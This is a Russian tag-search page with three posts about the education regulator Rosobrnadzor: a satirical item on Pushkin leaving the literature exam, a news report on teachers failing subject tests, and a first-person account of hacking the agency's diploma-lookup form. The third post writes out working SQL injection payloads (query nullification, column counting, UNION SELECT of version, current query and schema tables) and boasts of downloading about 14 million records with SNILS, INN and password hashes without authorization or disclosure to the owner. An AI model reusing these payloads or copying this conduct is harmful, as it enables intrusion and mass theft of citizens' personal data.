Результаты поиска потегурособрнадзор

Дополнительные фильтры
Теги:
рособрнадзорновый тег
Автор поста
Рейтинг поста:
-∞050100200300400+
Найдено: 3
Сортировка:
В проект Единого государственного экзамена по литературе на 2024 год «Солнце русской поэзии» не включили.

Помимо Пушкина, персонами нон грата стали Лермонтов, Фонвизин, Державин, Жуковский, Гоголь и Грибоедов.

Для сравнения: в прошлом учебном году ЕГЭ по литературе ещё не обходился без Пушкинских «Капитанской дочки» и «Евгения Онегина», Лермонтовского «Героя нашего времени», Фонвизинского «Недоросля», Грибоедовского «Горя от ума» и вечно актуального (нынче в особенности) Гоголевского «Ревизора».

Но не грустите. Солженицынские «Архипелаг ГУЛАГ» и «Один день Ивана Денисовича» на месте, причём последний входит в 12 произведений, которые рекомендуется знать особенно хорошо, потому что по ним может попасться тема сочинения.

В Рособрнадзоре объяснили, что ликвидировали Пушкина и других писателей первой половины XIX века, чтобы не перегружать выпускников программой средней школы.
А пока Онегин, Чацкий, Печорин и Хлестаков расступаются перед обитателями ГУЛАГа, Комитет Госдумы по вопросам семьи, женщин и детей пытается выяснить у Минпросвещения, почему русские классики пали жертвами ЕГЭ.

***

Ну и вместо эпилога:

Товарищ, верь: взойдет она,
Звезда пленительного счастья,
Россия вспрянет ото сна,
И на обломках самовластья
Напишут наши имена!

Александр Пушкин

Половина учителей математики не прошли проверку на знание своего предмета.

rbc.ru
Рособрнадзор подвел предварительные итоги аттестации российских учителей-предметников и пришел к неутешительным выводам. Аттестация проходит в обезличенном виде в рамках госпрограммы по повышению качества образования в России.
Результаты математиков.
Половина преподавателей математики и информатики, принимавших участие в исследовании Рособрнадзора, не справились с задачами по своему предмету, говорится в сообщении ведомства. К такому выводу надзорное ведомство пришло после того, как провело добровольное тестирование 22 тыс. учителей по разным предметам в 67 субъектах России.

«По таким предметным областям, как «Математика и информатика» и «Основы духовно-нравственной культуры народов России», не справились с работой почти половина участников исследования», — говорится в сообщении Рособрнадзора. Почти четверть учителей получили неудовлетворительные оценки своей профессиональной пригодности по таким предметам, как экономика, «Россия в мире», русский язык и литература. Самый высокий уровень подготовки продемонстрировали преподаватели родного языка и родной литературы, а также преподаватели «Обществознания» и «Права».
Как проверяют учителей.
Учителей оценивали в тестовом режиме и на добровольной основе, присоединиться к исследованию могли все желающие, ранее сообщал Рособрнадзор. Результаты обрабатываются обезличенно и никак не повлияют на работу участников исследования и школ. Оценка компетенций проводилась на основании единых федеральных оценочных материалов (ЕФОМ), разработанных еще по заказу Минобрнауки (в мае 2018 года правительство разделило его на два ведомства — Министерство просвещения и Министерство науки и высшего образования). Они предусматривают не только проверку знаний по предмету, но и умение решать методические задачи, а также оценивать работы учащихся. Подразумевает исследование и сбор мнений учителей о содержании диагностической работы.
«Лучше объективная оценка, чем высокая и оторванная от реальности», — считает глава Рособрнадзора ​Сергей Кравцов. По его словам, надзорному ведомству теперь предстоит «спокойно проанализировать» полученные результаты, понять, как помочь учителю, а также сделать «соответствующие выводы для системы педагогического образования и повышения квалификации».
Исследование профпригодности учителей и последующая разработка рекомендаций и программ подготовки учителей — часть программы Национальной системы учительского роста, которая вошла в майские указы Владимира Путина. Одной из целей этой программы должно стать достижение Россией места в топ-10 стран мира по качеству общего образования.
Исследования компетенций учителей в разных формах и по разным предметам проводились Рособрнадзором с 2015 года. До 2020 года ведомство должно разработать единые федеральные оценочные материалы по всем школьным предметам. В 2019 году проверку планируется провести среди учителей географии, физики, химии, биологии, иностранных языков, физкультуры и ОБЖ.
Недовольство профсоюза.
О результатах тестирования можно судить только после изучения материалов, по которым проверяли учителей, сказала оргсекретарь профсоюза «Учитель» Ольга Мирясова. «Сейчас, независимо от добровольной апробации, которую провел Рособрнадзор, все учителя обязаны проходить аттестацию раз в пять лет. Материалы для таких аттестаций не единообразны, и это позволяет некоторым школам с помощью этих тестов увольнять неугодных учителей. Специально составляются такие задания, на которые невозможно дать правильный ответ. Мы представляем в суде интересы одной учительницы, которая отстаивает свое право работать в школе после аттестации. Как минимум семь заданий в ее материалах было сформулировано некорректно», — пояснила она. При этом, указала Мирясова, если в России будут введены единые тестовые задания для всех учителей, это позволит избежать таких ситуаций, о которых она говорит. Главное, чтобы задания были составлены корректно и соответствовали той школьной программе, с которой работают учителя.
Некорректно в тестовом формате проверять умения учителей решать методические задачи, уверена Мирясова. «Такие умения педагога всегда оценивались с помощью открытых уроков», — заметила она. По ее мнению, в тесте учитель может показать только свои знания терминов из психологии, а не умение работать с детьми.
Научный руководитель Центра мониторинга качества образования НИУ ВШЭ Виктор Болотов в разговоре с РБК выразил сомнение в том, что были проведены все необходимые процедуры для того, чтобы исследование Рособрнадзора вызывало доверие. «Раз нет доказательств надежности измерительных материалов, непонятна процедура проведения этих исследований, то доверять результатам этих исследований не стоит», — говорит Болотов.
"И так сойдёт… или как данные 14 миллионов россиян оказались у меня в руках"


Одиноким вечером, глядя на свою пустую зачётку и осознавая, что конец близок, я снова задумался о том, как бы мне сейчас собрать сумку, или даже просто рюкзак, положить туда рубашку, шорты и свалить в тёплую страну. Было бы хорошо, да вот с дипломом живётся намного лучше. Во всяком случае, мне всегда так говорят.

Также часто слышал много историй про людей, которые приходили на собеседования с красными дипломами МГУ, но при этом абсолютно не разбирались в своей специальности, а потом на корпоративах признавались, что диплом у них купленный.

Но времена сейчас другие, сейчас 21 век, век больших возможностей, любой работодатель, который умеет пользоваться мышкой и знает, как выглядит браузер на рабочем столе, может проверить данные диплома. Каждый диплом, который выдаётся учебным заведением, теперь регистрируется в едином реестре, доступ к которому есть у каждого через сайт Федеральной службы по надзору в сфере образования и науки.

ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ ОБРАЗОВАНИЯ И НАУКИ
РОСОБРНАДЗОР,взлом,информационная безопасность,sql,PostgreSQL,длиннопост,geektimes,habrahabr,текст,Истории,obrnadzor,много букв,рособрнадзор,СНИЛС,инн,дыра


Для получение информации о документе об образовании достаточно просто заполнить форму, передвинуть слайдер и нажать кнопку. Вам либо покажут информацию о документе, либо скажут, что такого нет (но ещё рано обвинять соискателя в обмане, мало ли, что могло произойти).

Для поиска введите точные значения реквизитов, указанные на бланке документа: Более подробно о работе с данным сервисом можно ознакомиться по ссылке
Уровень образования
Не выбрано
Уровна* обрио
Наименование 00: Фамилия обладателя документа: Серия бланка: Номер бланка Дата выдачи:
О Найти 00 по


Ну и пока я смотрел на эту форму, решил я с ней поиграться. Повводил всякой чепухи, и бац — на поле, в которое было введено 1', я получаю такой response:

<h2>Произошла ошибка</h2><p>SQLSTATE[42601]: Syntax error: 7 ERROR: syntax error at or near "4"LINE 6: ...me) = UPPER('1'')) AND (doc.education_level_id = '4') AND (U... ^</p>

Голый SQL Injection. Очевидно, что задачи продумать обработку ошибок перед разработчиком не было. Задача была сделать сервис, который работает. Сервис, который является гарантом. Так одинокий вечер превратился в весёлую одинокую ночь.

Ещё будучи подростком я очень любил всякие крутые истории про хакеров, а после того, как решил заняться программированием, изредка почитывал и интересные статьи по взлому и прочему. Так что то, что нужно делать дальше — я знал.

Так как разработчик этого сервиса дал нам удовольствие видеть ещё и часть запроса, то мы можем с уверенностью предположить, что это SELECT запрос. Теперь нам нужно как-то обнулить действие запроса, записанного в php-скрипте, а потом с помощью переменной вставить свой.

Для обнуления запроса достаточно просто добавить невозможное условие и закомментировать последующие строки запроса, что-то наподобие:

Инъекция
...me) = UPPER('1') AND (1=0)) — ')) AND (doc.education_level_id = '4') AND (U…

В ответ просто пришло сообщение о том, что документ не найден.

Также пробовал использовать вместо невозможного условия, наоборот, очевидные. А именно пробовал искать какой-либо документ по id. Писал id=1, id=1024 и прочее, но результатов не дало. Видимо, id давно перевалило за тысячи (спойлер: за миллионы).

Также я совершенно не надеялся на то, что запрос придёт без ошибки. Я был уверен, что пробелы будут экранироваться, удаляться, запрещаться, ещё что-нибудь. Ведь в форме на странице поиска ввести фамилию с пробелами невозможно. Но всё оказалось в разы проще.

Ну а теперь бы хотелось вытащить что-то действительно интересное. Изменить структуру ответа мы не можем никак, то есть если в запросе были, например, SELECT id, name, count, то так оно и останется. Значит надо подстраиваться, а для начала понять, какие же данные запрашиваются из БД, и, главное, сколько? Существует много способов узнать количество полей, но мне помог только ORDER BY. Как это работает?

ORDER BY сделан для сортировки, но его синтаксис не требует обязательно указывать имя поля, достаточно указать его позицию в запросе. Если указать номер позиции больше, чем количество запрашиваемых полей — то будет ошибка. Методом перебора можно подобрать количество полей. Их оказалось 55.

Хочется понять, с чем же мы работаем, что это за база данных такая? Предположим, что это MySQL, в MySQL есть функция Version(), которая возвращает версию БД. Применим:

Инъекция
...me) = UPPER('1') AND (1=0)) UNION SELECT 1,version(),тут ещё 53 поля, типы которых ещё надо определить методом подбора — ')) AND (doc.education_level_id = '4') AND (U…

В ответ пришёл JSON, в котором было:

PostgreSQL 9.1.2 on x86_64-alt-linux-gnu, compiled by x86_64-alt-linux-gcc (GCC) 4.5.3 20120111 (ALT Linux 4.5.3-alt1.M60C.1), 64-bit
Отлично, мы знаем систему, версию БД (под неё вроде даже эксплоиты были). Поле для действия расширилось. Узнаём, как выглядит запрос:

Инъекция
...me) = UPPER('1') AND (1=0)) UNION SELECT 1,current_query(),тут ещё 53 поля, типы которых ещё надо определить методом подбора — ')) AND (doc.education_level_id = '4') AND (U…

Ответ:
"SELECT "doc".*, "doc_type"."type", "stat"."name" AS "status", "level"."name" AS "level", "rec"."name" AS "rec_name", "rec"."surname" AS "rec_surname", "rec"."patronymic" AS "rec_lastname" FROM "documents" AS "doc" LEFT JOIN "document_types" AS "doc_type" ON doc_type.id = doc.document_type_id LEFT JOIN "document_packages" AS "dp" ON doc.document_package_id = dp.id LEFT JOIN "documents_status" AS "stat" ON stat.id = doc.status_id LEFT JOIN "education_levels" AS "level" ON level.id = doc.education_level_id LEFT JOIN "recipients" AS "rec" ON rec.id = doc.recipient_id WHERE (dp.status = 3) AND (doc.organization_id = '573') AND (doc.year = '2018-01-01') AND (UPPER(rec.surname) = UPPER('1')) UNION SELECT 1,current_query(),'3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '01.01.1970', '01.01.1970', '21', '01.01.1970', '23', '24', '25', '26', '01.01.1970', '28', '29', '30', '31', '32', '33', '28-05-2004 11:11:59', '35', '36', '28-05-2004 11:11:59', '38', '39', '40', '41', '42', '43', '44', '45', '46', '47', '48', '49', '50', '51', '52', '53', '54', '55' -- ')) AND (doc.education_level_id = '4') AND (UPPER(doc.series) = UPPER('1')) AND (doc.number = '1') LIMIT 1"

Вся картина перед нами.

Попробуем узнать, что же за таблицы есть во всей базе данных:

Инъекция
...me) = UPPER('1') AND (1=0)) UNION SELECT 1,table_name,тут ещё 53 поля, типы которых ещё надо определить методом подбора FROM information_schema.tables — ')) AND (doc.education_level_id = '4') AND (U…

Таким образом получили все таблицы. Узнаём столбцы каждой таблицы следующим образом:

Инъекция
...me) = UPPER('1') AND (1=0)) UNION SELECT 1,CONCAT(column_name,' ',data_type,' ',is_nullable),тут ещё 53 поля, типы которых ещё надо определить методом подбора FROM information_schema.columns WHERE table_name='Какое-то имя таблицы' — ')) AND (doc.education_level_id = '4') AND (U…

Итак, зная структуру базы данных, я написал скрипт на Питон и выкачал все самые интересные на мой взгляд данные. А именно:

Таблицу с дипломами об образовании (серия, номер, год поступления, год окончания, СНИЛС!, ИНН!!, серия и номер паспорта (честно говоря, у всех записей поля пустые, но сам факт!), дата рождения, национальность (зачем?), учебная организация, выдавшая документ), таблицу с гражданами с образованием (там всё проще: ФИО и всё), таблицу с пользователями системы (стандартно, логин, email, и, НЕОЖИДАНО, md5 хэш пароля, хоть не сам пароль), отдельная таблица admin с одной записью (так же: логин, хэш пароля и прочее), таблица с информацией об учебных заведениях (кто начальник, email, телефон, лицензия — в общем всё, что и так есть в открытом доступе) и ещё кучу вспомогательных таблиц.

По объёмам получилось: около 14 000 000 документов об образовании, около 14 000 000 записей с данными о бывших студентах, 1322 пользователя системы, 1 админ, который логинится по будням в системе, видимо, когда на работу приходит, 3391 учебное заведение и горы непонятной информации типа ОКОГУ и прочее. База весом 5 гб.

А теперь представьте, сколько времени это качалось. Вы думаете, кто-то заметил? Может быть сервис резко отключился, ip заблокировали или ещё что-то? НЕТ!

Конечно, целью не является использовать эту информацию в корыстных целях (да я и не представляю, как). Иначе бы я не писал статью здесь. Но и писать лично администрации сайта или кто там за него отвечает я тоже не горю желанием, хватило истории про Микротех.

Дополнительно решил проверить хэши по радужным таблицам. Не уверен, конечно, что они хэшировались именно голым md5, но, во всяком случае, в открытых базах данных совпадений ни к одному хэшу не нашлось. Или я что-то не умею.

Мог бы я продолжить и получить доступ в систему? Смог бы я сам изменять записи и добавлять свои? Вполне возможно, но я решил этого не делать. Да и сессию надо закрывать, без диплома-то никак…

Здесь мы собираем самые интересные картинки, арты, комиксы, мемасики по теме (+3 постов - )